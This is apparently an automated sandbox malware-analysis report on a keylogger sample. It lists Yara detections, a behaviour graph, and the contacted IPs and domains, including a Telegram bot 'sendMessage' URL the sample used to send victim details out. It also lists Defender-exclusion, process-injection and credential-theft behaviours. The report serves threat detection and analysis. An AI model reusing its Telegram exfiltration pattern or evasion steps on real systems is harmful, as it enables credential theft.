Source: Yara match File source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519297 Sample: SecuriteInfo.com.Win32.Cryp... Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 24 reallyfreegeoip.org 2->24 26 api.telegram.org 2->26 28 2 other IPs or domains 2->28 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus detection for URL or domain 2->40 46 14 other signatures 2->46 8 SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe 4 2->8         started        signatures3 42 Tries to detect the country of the analysis system (by using the IP) 24->42 44 Uses the Telegram API (likely for C&C communication) 26->44 process4 file5 22 SecuriteInfo.com.W....1497.25511.exe.log, ASCII 8->22 dropped 48 Adds a directory exclusion to Windows Defender 8->48 50 Injects a PE file into a foreign processes 8->50 12 SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe 15 2 8->12         started        16 powershell.exe 23 8->16         started        signatures6 process7 dnsIp8 30 api.telegram.org 149.154.167.220, 443, 49764 TELEGRAMRU United Kingdom 12->30 32 reallyfreegeoip.org 188.114.97.3, 443, 49745, 49747 CLOUDFLARENETUS European Union 12->32 34 checkip.dyndns.com 132.226.8.169, 49744, 49749, 49751 UTMEMUS United States 12->34 52 Tries to steal Mail credentials (via file / registry access) 12->52 54 Tries to harvest and steal browser information (history, passwords, etc) 12->54 56 Loading BitLocker PowerShell Module 16->56 18 WmiPrvSE.exe 16->18         started        20 conhost.exe 16->20         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
132.226.8.169
 checkip.dyndns.com United States
16989 UTMEMUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.97.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 132.226.8.169 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://checkip.dyndns.org/ false
  • URL Reputation: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2026/09/2024%20/%2021:13:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://reallyfreegeoip.org/xml/8.46.123.33 false
  • Avira URL Cloud: safe
 unknown